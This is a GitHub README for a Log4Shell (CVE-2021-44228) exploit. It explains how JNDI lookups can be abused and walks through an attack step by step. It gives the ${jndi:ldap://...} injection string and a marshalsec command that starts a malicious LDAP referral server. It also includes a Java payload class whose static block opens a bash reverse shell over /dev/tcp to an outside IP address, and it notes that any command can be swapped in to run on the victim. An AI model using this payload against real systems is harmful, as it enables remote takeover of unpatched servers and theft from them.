/Log4j-Java-Payload

Simple Java Payload to exploit Log4j vulnerability

Primary LanguageJava

About Log4Shell - CVE-2021-44228

Log4j is one of the most popular java frameworks.

This framework involves an API call JNDI.

This API allows developer to resolve naming services. JNDI has a function “Object lookup” which gives the possibility to return an object from its name. For example, JNDI can query dns server to make correspondence between a domain name and an IP address, JNDI can also query a lot of services like LDAP or NIS…

The vulnerability takes place because log4j allow request to arbitrary LDAP or DNS server without checking the server response. Then, an attacker can build malicious LDAP server and make the application execute a payload hosted on the fake LDAP.

Overview of the Attack

log4j schema Final

Exploit Log4j

1. Find Entry Point

You have to find entry point by injecting request to triggers JNDI lookup resolution to the malicious LDAP.

String to inject: ${jndi:ldap://<ip>:<port>/<name-of-the-payload-to-execute>}

First, you can start netcat listener and try to trigger it. If the netcat listener is trigger, then you know that the application is vulnerable.

Demo:

image image

2. Build Malicious Server

In our case we gonna build malicious ldap server. For that you can download this github project: https://github.com/mbechler/marshalsec.git

Once you are in the project, you are able to build malicious ldap server that redirects connection to a web server which host the payload in order to provide it to the JNDI lookup resolution

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://<Web-Server-IP>:<Port>/#<name-of-the-payload>

Demo :

image

3. Build Java Payload

Java Payload

public class ExploitTest {

    static {
        try {
            java.lang.Runtime.getRuntime().exec(new String[] {"/bin/bash", "-c", "bash -i >& /dev/tcp/10.170.0.120/9001 0>&1"}).waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

}

Note: You can replace the last element of the string array by whatever command you want to be executed on the victim host

When your payload is done and ready, you can compile it.

Note: Keep in mind that the name of your class must be in the same of your .java file otherwise you will get an error during the compilation.

Demo :

image

4. Ready to Exploit

You can now start web server in the directory of the .class payload.

Hope you get this:

image